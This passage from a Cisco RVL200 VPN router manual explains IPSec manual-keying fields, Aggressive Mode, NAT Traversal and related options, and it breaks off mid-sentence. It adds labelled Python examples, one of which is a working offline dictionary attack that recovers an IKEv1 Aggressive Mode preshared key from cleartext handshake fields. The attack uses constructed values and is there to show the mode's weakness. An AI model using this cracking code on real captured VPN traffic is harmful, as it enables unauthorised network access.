Chapter 4, Advanced configuration – Cisco 4-Port SSL/IPSec VPN Router RVL200 User Manual


Chapter 4: Advanced Configuration
4-Port SSL/IPSec VPN Router User Manual, page 9

Incoming and Outgoing SPI (Security Parameter Index)

The SPI is carried in the ESP (Encapsulating Security Payload) header and lets the receiver and sender select the SA under which a packet is processed. Enter the value in hexadecimal; the valid range is 100 to ffffffff (values below 100 are reserved by the ESP specification). Each tunnel must have a unique Incoming SPI and Outgoing SPI, and no two tunnels may share an SPI. The Incoming SPI here must match the Outgoing SPI at the other end of the tunnel, and vice versa. If the pair is not mirrored, ESP packets arrive with an SPI for which the receiver has no SA and are discarded, which appears as a tunnel that is up but passes no traffic in one direction.

Encryption

Select a method of encryption, DES or 3DES. This determines the length of the key used to encrypt and decrypt ESP packets: DES uses a 56-bit key and 3DES a 168-bit key. Of the two, 3DES is recommended because it is the stronger; a 56-bit DES key can be recovered by exhaustive search with modest hardware, and 3DES itself offers only about 112 bits of effective strength and is now considered a legacy algorithm. Make sure both ends of the VPN tunnel use the same encryption method.

Authentication

Select a method of authentication, MD5 or SHA1. The authentication method determines how ESP packets are validated. MD5 is a one-way hashing algorithm that produces a 128-bit digest. SHA1 is a one-way hashing algorithm that produces a 160-bit digest. SHA1 is recommended because it is more secure. Make sure both ends of the VPN tunnel use the same authentication method.

Encryption Key

This field specifies the key used to encrypt and decrypt IP traffic. Enter the key as hexadecimal digits. If DES is selected, the Encryption Key is 64 bits (56 of which the cipher uses), entered as 16 hexadecimal digits. If 3DES is selected, the Encryption Key is 192 bits, entered as 48 hexadecimal digits. In either case, if you enter fewer digits than required, the Router completes the rest of the key with zeros, so the field always holds a full-length key. A padded key is accepted but contains only as much secret material as you typed: four digits padded out to a DES key leave 16 bits for an attacker to guess, not 56. Always enter a full-length key generated at random. Make sure both ends of the VPN tunnel use the same Encryption Key.

Authentication Key

This field specifies the key used to authenticate IP traffic. Enter the key as hexadecimal digits. If MD5 is selected, the Authentication Key is 128 bits, entered as 32 hexadecimal digits. If SHA1 is selected, the Authentication Key is 160 bits, entered as 40 hexadecimal digits. If you enter fewer digits than required, the Router completes the rest of the key with zeros until it has the full 32 or 40 digits; as with the Encryption Key, the zeros add no secrecy, so enter the full length. Make sure both ends of the VPN tunnel use the same Authentication Key.
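The SPI, Encryption Key and Authentication Key rules above, as an added helper script that is not part of the Cisco manual: it validates one end's fields, reproduces the zero-padding the Router applies to a short key and reports how much of the key was actually chosen, checks that no SPI is reused across tunnels, and derives the mirrored settings (Incoming and Outgoing SPI swapped) for the other end. The tunnel definition at the bottom is constructed for illustration.

```python
"""Manual-keying helper for the SPI, Encryption Key and Authentication Key fields.

Added example, not Cisco's code. It encodes the field rules on this page (hex SPI
in 100..ffffffff, unique per tunnel; DES/3DES keys of 16/48 hex digits; MD5/SHA1
keys of 32/40 hex digits; short keys completed with zeros) and derives the
settings the other end must use. The tunnel definition at the bottom is
constructed for illustration.
"""
import secrets

ENC_KEY_HEX = {"DES": 16, "3DES": 48}    # 64-bit and 192-bit keys, in hex digits
AUTH_KEY_HEX = {"MD5": 32, "SHA1": 40}   # 128-bit and 160-bit keys, in hex digits
SPI_MIN, SPI_MAX = 0x100, 0xFFFFFFFF     # the range the router accepts
HEX_DIGITS = set("0123456789abcdef")


def parse_spi(text):
    """Parse a hex SPI string and enforce the accepted range."""
    value = int(text, 16)
    if not SPI_MIN <= value <= SPI_MAX:
        raise ValueError(f"SPI {text!r} is outside 100..ffffffff")
    return value


def pad_key(hexkey, needed):
    """Mimic the router: a short key is completed with zeros to `needed` digits."""
    hexkey = hexkey.lower()
    if len(hexkey) > needed or not set(hexkey) <= HEX_DIGITS:
        raise ValueError(f"key must be at most {needed} hex digits: {hexkey!r}")
    return hexkey + "0" * (needed - len(hexkey))


def supplied_bits(hexkey):
    """Key bits the operator actually chose; zero padding adds none."""
    return 4 * len(hexkey)


def generate_key(needed):
    """A full-length random key, the right way to fill these fields."""
    return secrets.token_hex(needed // 2)


def mirror_tunnel(local):
    """Validate one end's fields; return the remote end's fields and any warnings."""
    enc, auth = local["encryption"], local["authentication"]
    enc_key = pad_key(local["encryption_key"], ENC_KEY_HEX[enc])
    auth_key = pad_key(local["authentication_key"], AUTH_KEY_HEX[auth])
    spi_in = parse_spi(local["incoming_spi"])
    spi_out = parse_spi(local["outgoing_spi"])
    warnings = []
    for name, key, needed in (
        ("encryption", local["encryption_key"], ENC_KEY_HEX[enc]),
        ("authentication", local["authentication_key"], AUTH_KEY_HEX[auth]),
    ):
        if len(key) < needed:
            warnings.append(f"{name} key zero-padded: only {supplied_bits(key)} of "
                            f"{4 * needed} bits were chosen by you")
    if enc == "DES":
        warnings.append("DES: a 56-bit key is recoverable by exhaustive search")
    remote = {
        "encryption": enc,
        "authentication": auth,
        "encryption_key": enc_key,        # identical key material at both ends
        "authentication_key": auth_key,
        "incoming_spi": f"{spi_out:x}",   # our Outgoing SPI is their Incoming SPI
        "outgoing_spi": f"{spi_in:x}",    # and vice versa
    }
    return remote, warnings


def check_unique_spis(tunnels):
    """No two tunnels on the router may share an SPI, in either direction."""
    seen = {}
    for name, tunnel in tunnels.items():
        for field in ("incoming_spi", "outgoing_spi"):
            spi = parse_spi(tunnel[field])
            if spi in seen:
                raise ValueError(f"SPI {spi:x} used by {seen[spi]} and {name}.{field}")
            seen[spi] = f"{name}.{field}"
    return True


# Constructed example: 3DES/SHA1 with a deliberately short encryption key.
BRANCH_A = {
    "encryption": "3DES", "authentication": "SHA1",
    "encryption_key": "0123456789abcdef",     # 16 of the 48 digits 3DES needs
    "authentication_key": generate_key(40),
    "incoming_spi": "1001", "outgoing_spi": "1002",
}

if __name__ == "__main__":
    remote, warnings = mirror_tunnel(BRANCH_A)
    check_unique_spis({"branch-a": BRANCH_A})
    print("configure the remote end with:", remote)
    for w in warnings:
        print("warning:", w)
```

Run it once per tunnel before typing values into both GUIs; the warning about a padded key is the check the Router itself does not give you.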

Advanced

For most users, the settings on the VPN page should suffice;

however, the Router provides advanced IPSec settings for

advanced users using the IKE with Preshared Key mode.

Click Advanced to view the Advanced settings.


Aggressive Mode

There are two types of Phase 1 exchange, Main Mode and Aggressive Mode. Aggressive Mode completes Phase 1 in three messages instead of Main Mode's six, but with a preshared key it sends the peer identities and the authentication hash unencrypted, so anyone who captures the exchange can test candidate preshared keys against it offline. If network security is preferred, leave the Aggressive Mode check box unchecked (Main Mode will be used). If network speed is preferred, select Aggressive Mode. If you select one of the Dynamic IP types for the Remote Security Gateway Type setting, Main Mode is unavailable and Aggressive Mode will be used; in that case choose a long, random preshared key, because it is the only secret protecting the exchange.
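Why the manual ties Aggressive Mode to reduced security, shown as an added example that is not from the Cisco manual: it computes the IKEv1 preshared-key responder hash HASH_R exactly as RFC 2409 section 5.4 defines it, using only fields that travel in the clear in Aggressive Mode messages 1 and 2, and then recovers a weak preshared key by dictionary search. In Main Mode the same hashes are sent encrypted in messages 5 and 6, so a passive observer has nothing to test against. The nonces, Diffie-Hellman values, cookies, SA body and identity below are constructed stand-ins, not a capture, and the word list is constructed.

```python
"""What Aggressive Mode gives away with a preshared key (IKEv1, RFC 2409 s.5.4).

Added example, not Cisco's code. In Aggressive Mode the responder's HASH_R is
sent unencrypted in message 2, and every other input to it (nonces, DH public
values, cookies, SA proposal, responder ID) is visible in messages 1 and 2, so a
passive observer can test candidate preshared keys offline. The exchange values
and the candidate list below are constructed stand-ins, not a capture.
"""
import hashlib
import hmac
import random


def prf(key, data, hashname="sha1"):
    """IKEv1 prf: HMAC with the negotiated hash (MD5 or SHA1 on this router)."""
    return hmac.new(key, data, getattr(hashlib, hashname)).digest()


def skeyid_psk(psk, ni_b, nr_b, hashname="sha1"):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b, hashname)


def hash_r(psk, ex, hashname="sha1"):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, ex["ni_b"], ex["nr_b"], hashname)
    data = (ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
            + ex["sai_b"] + ex["idir_b"])
    return prf(skeyid, data, hashname)


def crack_psk(observed_hash_r, ex, candidates, hashname="sha1"):
    """Offline dictionary attack: the PSK is the only unknown input to HASH_R."""
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand.encode(), ex, hashname), observed_hash_r):
            return cand
    return None


def constructed_exchange(seed=1):
    """Stand-in for the cleartext fields of Aggressive Mode messages 1 and 2."""
    rng = random.Random(seed)

    def rb(n):
        return bytes(rng.getrandbits(8) for _ in range(n))

    return {
        "cky_i": rb(8),      # initiator cookie (ISAKMP header)
        "cky_r": rb(8),      # responder cookie
        "gxi": rb(128),      # initiator DH public value (KE payload, 1024-bit group)
        "gxr": rb(128),      # responder DH public value
        "ni_b": rb(20),      # initiator nonce body
        "nr_b": rb(20),      # responder nonce body
        # constructed SA payload body and responder ID (ID_IPV4_ADDR, UDP/500, 203.0.113.1)
        "sai_b": bytes.fromhex("00000001000000010000002c"),
        "idir_b": bytes([1, 17]) + (500).to_bytes(2, "big") + bytes([203, 0, 113, 1]),
    }


if __name__ == "__main__":
    ex = constructed_exchange()
    observed = hash_r(b"cisco123", ex)       # what the responder put on the wire
    wordlist = ["password", "vpn2010", "cisco123", "letmein"]
    print("recovered PSK (SHA1):", crack_psk(observed, ex, wordlist))
    print("recovered PSK (MD5): ",
          crack_psk(hash_r(b"cisco123", ex, "md5"), ex, wordlist, "md5"))
```

The attack costs one HMAC per candidate, so a preshared key that appears in any word list is recovered in seconds from a single captured exchange; a long random key is the only defence when Aggressive Mode is forced by a dynamic-IP peer.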

Compress (Support IP Payload Compression Protocol (IPComp))

IP Payload Compression is a protocol that reduces the size of IP datagrams. Select this option if you want the Router to propose compression when it initiates a connection. If the responder rejects the proposal, the Router will not use compression. When the Router acts as a responder, it always accepts compression if the peer proposes it, even when this option is not enabled, so clearing the check box only stops the Router from proposing compression itself.

Keep-Alive

Keep-Alive helps maintain IPSec VPN tunnel connections. If the Router detects that the tunnel has dropped, it re-establishes the connection immediately. Select this option to use this feature.

NetBIOS Broadcast

Select this option to allow NetBIOS

traffic to pass through the VPN tunnel. By default, the

Router blocks this traffic.

NAT Traversal

This is enabled by default. Both the IPSec initiator and responder must support the mechanism for detecting a NAT router in the path (NAT-D payloads, as defined in RFC 3947) and for moving IKE and ESP to UDP port 4500 once one is found (UDP encapsulation of ESP, as defined in RFC 3948). If the peer does not support it, the tunnel will negotiate but ESP packets will not pass through the NAT.
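The two mechanisms the NAT Traversal option relies on, as an added example that is not from the Cisco manual: the NAT-D hash of RFC 3947 that each peer sends so the other can tell whether a NAT rewrote its address, and the rules of RFC 3948 for telling apart the NAT-keepalive, IKE and UDP-encapsulated ESP datagrams that all share UDP port 4500 afterwards (useful when reading a capture of a tunnel that negotiates but passes no traffic). The cookies, addresses and packet bytes are constructed, not captured.

```python
"""NAT detection (RFC 3947) and UDP/4500 demultiplexing (RFC 3948).

Added example, not Cisco's code. nat_d_hash() is the NAT-D payload a peer sends;
the receiver recomputes it over the source address it actually saw, and a
mismatch means a NAT rewrote the packet. classify_udp4500() separates the
NAT-keepalive, IKE (four-zero-byte Non-ESP Marker) and UDP-encapsulated ESP
datagrams that all arrive on port 4500. Cookies, addresses and packets below
are constructed, not captured.
"""
import hashlib
import ipaddress
import struct


def nat_d_hash(cky_i, cky_r, ip, port, hashname="sha1"):
    """RFC 3947 s.3.2: HASH(CKY-I | CKY-R | IP | Port), IP and port in network byte order."""
    h = hashlib.new(hashname)
    h.update(cky_i + cky_r + ipaddress.ip_address(ip).packed + struct.pack("!H", port))
    return h.digest()


def nat_detected(received_nat_d, cky_i, cky_r, seen_ip, seen_port, hashname="sha1"):
    """True when the peer's NAT-D hash does not match the address we received it from."""
    return received_nat_d != nat_d_hash(cky_i, cky_r, seen_ip, seen_port, hashname)


def classify_udp4500(payload):
    """Return (kind, detail) for one UDP/4500 payload, per RFC 3948 s.2.2 and s.2.3."""
    if payload == b"\xff":
        return "keepalive", None            # single-octet NAT-keepalive
    if len(payload) < 8:
        raise ValueError("too short for IKE or ESP")
    if payload[:4] == b"\x00\x00\x00\x00":
        # Non-ESP Marker, then the ISAKMP header; report the initiator cookie
        return "ike", payload[4:12].hex()
    (spi,) = struct.unpack("!I", payload[:4])   # an ESP SPI is never zero, so no ambiguity
    return "esp", spi


# Constructed scenario: the initiator sits at 192.168.1.10 behind a NAT that
# presents it as 198.51.100.7; the responder sees only the NAT's address.
CKY_I = bytes.fromhex("0011223344556677")
CKY_R = bytes.fromhex("8899aabbccddeeff")

if __name__ == "__main__":
    sent = nat_d_hash(CKY_I, CKY_R, "192.168.1.10", 500)  # computed by the initiator
    print("NAT in path:", nat_detected(sent, CKY_I, CKY_R, "198.51.100.7", 500))
    for pkt in (b"\xff",
                b"\x00\x00\x00\x00" + CKY_I + CKY_R + b"\x08\x10\x02\x00",
                struct.pack("!II", 0x1001, 1) + b"\x00" * 16):
        print(classify_udp4500(pkt))
```

A capture that shows IKE on port 500 but never any "esp" datagrams on 4500 after NAT is detected is the signature of a peer that negotiated NAT-T but did not switch ports.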

Dead Peer Detection (DPD)

When DPD is enabled, the Router sends periodic HELLO/ACK messages (the R-U-THERE and R-U-THERE-ACK notifications of RFC 3706) to check the status of the VPN tunnel. This feature works only when both peers of the VPN tunnel support the DPD mechanism. Once a dead peer has been detected,
